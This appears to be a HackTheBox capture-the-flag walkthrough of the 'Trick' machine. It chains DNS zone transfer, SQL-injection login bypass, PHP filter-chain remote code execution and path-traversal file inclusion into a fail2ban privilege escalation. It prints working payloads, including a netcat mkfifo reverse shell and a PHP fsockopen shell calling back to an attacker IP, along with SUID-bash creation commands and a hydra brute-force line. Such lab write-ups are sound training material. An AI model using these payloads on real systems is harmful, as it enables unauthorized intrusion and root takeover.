Trick | HackTheBox

Thu, 11 Jun 2026 17:01:48 +0530

Overview

Title	Trick
Difficulty	Easy
Machine	Linux
Maker

About Trick

Information Gathering

Scanned all TCP ports:

nmap -p- --min-rate 10000 -vv $IP -oA recon/nmap/ports

Nmap scan report for 10.129.168.255
Host is up, received syn-ack (0.18s latency).
Scanned at 2026-06-07 11:50:01 IST for 106s
Not shown: 42091 filtered tcp ports (no-response), 23440 closed tcp ports (conn-refused)
PORT STATE SERVICE REASON
22/tcp open ssh syn-ack
25/tcp open smtp syn-ack
53/tcp open domain syn-ack
80/tcp open http syn-ack

Enumerated open TCP ports:

nmap -p22,25,53,80 -sC -sV --min-rate 10000 $IP -oA recon/nmap/service

Nmap scan report for 10.129.168.255
Host is up, received conn-refused (0.27s latency).
Scanned at 2026-06-07 11:55:22 IST for 263s

PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 61:ff:29:3b:36:bd:9d:ac:fb:de:1f:56:88:4c:ae:2d (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC5Rh57OmAndXFukHce0Tr4BL8CWC8yACwWdu8VZcBPGuMUH8VkvzqseeC8MYxt5SPL1aJmAsZSgOUreAJNlYNBBKjMoFwyDdArWhqDThlgBf6aqwqMRo3XWIcbQOBkrisgqcPnRKlwh+vqArsj5OAZaUq8zs7Q3elE6HrDnj779JHCc5eba+DR+Cqk1u4JxfC6mGsaNMAXoaRKsAYlwf4Yjhonl6A6MkWszz7t9q5r2bImuYAC0cvgiHJdgLcr0WJh+lV8YIkPyya1vJFp1gN4Pg7I6CmMaiWSMgSem5aVlKmrLMX10MWhewnyuH2ekMFXUKJ8wv4DgifiAIvd6AGR
| 256 9e:cd:f2:40:61:96:ea:21:a6:ce:26:02:af:75:9a:78 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBAoXvyMKuWhQvWx52EFXK9ytX/pGmjZptG8Kb+DOgKcGeBgGPKX3ZpryuGR44av0WnKP0gnRLWk7UCbqY3mxXU0=
| 256 72:93:f9:11:58:de:34:ad:12:b5:4b:4a:73:64:b9:70 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIGY1WZWn9xuvXhfxFFm82J9eRGNYJ9NnfzECUm0faUXm
25/tcp open smtp? syn-ack
|_smtp-commands: Couldn't establish connection on port 25
53/tcp open domain syn-ack ISC BIND 9.11.5-P4-5.1+deb10u7 (Debian Linux)
| dns-nsid:
|_ bind.version: 9.11.5-P4-5.1+deb10u7-Debian
80/tcp open http syn-ack nginx 1.14.2
|_http-favicon: Unknown favicon MD5: 556F31ACD686989B1AFCF382C05846AA
|_http-server-header: nginx/1.14.2
|_http-title: Coming Soon - Start Bootstrap Theme
| http-methods:
|_ Supported Methods: GET HEAD
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Enumeration

Port 53

There’s a DNS server. We can use dig to find domain name.

dig -x 10.129.168.255 @10.129.168.255

Let’s add that to /etc/hosts

echo -e "$IP\ttrick.htb" | sudo tee -a /etc/hosts

Port 53 is using TCP instead of the usual UDP, which means AXFR zone transfer attack might be possible, since AXFR requests are restricted to TCP. With this, we can list all the DNS records from the server:

dig axfr trick.htb @10.129.168.255

With this we found one more domain - preprod-payroll.trick.htb

Port 80 - HTTP (Nginx)

There is nothing much in the trick.htb domain.

There’s a login page in preprod-payroll.trick.htb

Exploitation

SQL Injection in `preprod-payroll.trick.htb`

We can bypass the login by simply supplying the payload ' OR 1=1-- on both username and password fields.

And we are logged in as Administrator

There’s was credentials in the admin panel:

But it wasn’t working with ssh:

PHP File Inclusion

The page parameter might be vulnerable to file inclusion.

We can use filter:// wrapper to read php file contents. But the application appends .php at the end of the parameter value, so we can only read php files.

http://preprod-payroll.trick.htb/index.php?page=php://filter/convert.base64-encode/resource=index

Source code of index.php responsible for the file inclusion:

It also mentions auth.php which might contain database credentials.

But including auth didn’t return anything.

I also tried ../auth and ../../auth to see if the file has been moved to some other directories, but nothing was there either. Then I tried including header.php which gave some result:

But it was just HTML headers

I also tried login.php which included a db_connect.php file:

Now this one was showing results:

And there is database credentials:

I checked if this can be used to SSH into the system, but it didn’t work either:

PHP Filter Chain RCE

We can use filter chains to get remote code execution. The payload can be generated using the php_filter_chain_generator.py tool from synacktiv.

python3 ~/tools/php_filter_chain_generator.py --chain '<?php phpinfo(); ?>'

It will generate us a payload and we can use to see if this is working or not:

And it is working. We can try to create a payload for running a reverse shell:

python3 ~/tools/php_filter_chain_generator.py --chain '<?php $sock=fsockopen("10.10.16.8",6767);system("bash <&3 >&3 2>&3"); ?>'

But the generated payload was too large:

We can generate another payload that just executes the value from a cmd parameter.

python3 ~/tools/php_filter_chain_generator.py --chain '<?php system($_REQUEST["cmd"])?>'

We can use a POST request to add the cmd value:

I will use this payload for getting a reverse shell:

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|bash -i 2>&1|nc 10.10.16.8 6767 >/tmp/f

Lateral Movement to user

Local Enumeration

There are 2 users in this machine

Let’s see running processes

ps -aef --forest

From this we can see that there is a php pool running as michael. But we are currently logged in as www-data by exploiting a vulnerability in preprod-payroll.trick.htb. This hints that there might be another site which we can exploit to get shell access as michael.

We can check the nginx config to find the enabled sites:

cat /etc/nginx/sites-enabled/default

There we can see preprod-marketing.trick.htb.

LFI to Shell as Michael

Since we already have shell access, we can check the source code and see if there are any vulnerabilities in here.

ls -alp /var/www/

The site is located in /var/www/market, and we can see its source code:

This site is again vulnerable to file inclusion. But this time instead of appending .php at the end, they are prepending /var/www/maket/ at the start. Which means we can’t use wrappers like filter:// like we did before. They are also replacing ../ from the filename, but this can be bypassed easily, since the str_replace function is not replacing the substring recursively, instead it will just replace every occurrence of the substring in a single pass. In this case if we supply it an input like ....//....//....//....//etc/passwd it will become ../../../../etc/passwd after the string replace.

curl -ik 'http://preprod-marketing.trick.htb/index.php?page=....//....//....//....//etc/passwd'

HTTP/1.1 200 OK
Server: nginx/1.14.2
Date: Thu, 11 Jun 2026 09:06:52 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
<...SNIP...>
michael:x:1001:1001::/home/michael:/bin/bash

Since we already have shell access, we can write a php reverse shell at /tmp or any other location then call it from the above host and get shell as michael. I will create a php file that will make a suid bash and place it in /tmp.

echo '<?php system("cp /bin/bash /tmp/bash;chmod u+s /tmp/bash"); ?>' > /tmp/suid.php

Now send a request to this location:

curl -ik 'http://preprod-marketing.trick.htb/index.php?&page=....//....//....//....//tmp/suid.php'

It will give us a suid bash binary which we can use to escalate privilege as michael:

Privilege Escalation

Local Enumeration

First we need to get a proper shell, so I’ll check .ssh/ of michael.

We can see that there’s already an ssh key present. We can use it to login through SSH:

ssh michael@trick.htb -i id_rsa

Checking sudo privileges

sudo -l

Searched for writable file locations, but found nothing that stands out:

find / -type f -writable 2>/dev/null | grep -vE 'sys|proc|\/var\/www|\/home\/michael'

Michael is part of the security group

Checking if this group have write access anywhere:

find / -type f -perm -g+w 2>/dev/null | grep -vE 'sys|proc|\/var/\www|\/home\/michael'

Still nothing much. Then I checked if I have write access to any directories:

find / -type d -perm -g+w 2>/dev/null | grep -vE 'sys|proc|\/var/\www|\/home\/michael'

Turns out we have write access to /etc/fail2ban/action.d/.

Abusing `fail2ban`

Fail2ban is an IDS service that can be used for preventing bruteforce prevention. For example we can configure it to ban SSH clients after a specific amount of failed login attempts and for a specific amount of time.

To abuse this service for privilege escalation we have to overwrite the actionban value inside the /etc/fail2ban/action.d/iptables-multiport.conf file. When SSH bruteforce is detected fail2ban will execute the command we gave in place of actionban. Even though we don’t have write access to this file, we can replace the entire file with our own file or just delete it and create a new since we have write access to the entire directory.

Another thing to note is that there is a cronjob running that removes all the files in in the action.d directory and restore with the original content. So we might need to create a simple script to automate the task.

This is the one I created:

#!/bin/sh
mv /etc/fail2ban/action.d/iptables-multiport.conf /etc/fail2ban/action.d/iptables-multiport.conf.bak
cp /etc/fail2ban/action.d/iptables-multiport.conf.bak /etc/fail2ban/action.d/iptables-multiport.conf

sed -i 's/actionban = .*/actionban = chmod u+s \/bin\/bash/g' /etc/fail2ban/action.d/iptables-multiport.conf
sudo /etc/init.d/fail2ban restart

Run the script and try to bruteforce SSH using hydra:

hydra -I -u -l michael -P /usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt ssh://trick.htb -V

After sometimes the command will be executed:

Now we can read the root flag:

Htb on

Trick | HackTheBox

Overview

Information Gathering

Enumeration

Port 53

Port 80 - HTTP (Nginx)

Exploitation

SQL Injection in `preprod-payroll.trick.htb`

PHP File Inclusion

PHP Filter Chain RCE

Lateral Movement to user

Local Enumeration

LFI to Shell as Michael

Privilege Escalation

Local Enumeration

Abusing `fail2ban`

Reference

Htb on

Trick | HackTheBox

Overview

Information Gathering

Enumeration

Port 53

Port 80 - HTTP (Nginx)

Exploitation

SQL Injection in preprod-payroll.trick.htb

PHP File Inclusion

PHP Filter Chain RCE

Lateral Movement to user

Local Enumeration

LFI to Shell as Michael

Privilege Escalation

Local Enumeration

Abusing fail2ban

Reference

SQL Injection in `preprod-payroll.trick.htb`

Abusing `fail2ban`